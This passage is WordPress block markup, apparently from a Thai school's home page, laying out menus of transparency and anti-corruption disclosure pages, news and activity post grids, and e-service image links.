href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=716\" data-type=\"page\" data-id=\"716\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=708\" data-type=\"page\" data-id=\"708\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_74522c-22\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_df8487-4e\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_df8487-4e\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8c5230-93\",\"tabCount\":2,\"contentBgColor\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8c5230-93 kt-tabs-has-2-tabs kt-active-tab-1 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"_c20813-1f\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab_c20813-1f\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=700\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"_cc83b8-a1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab_cc83b8-a1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe 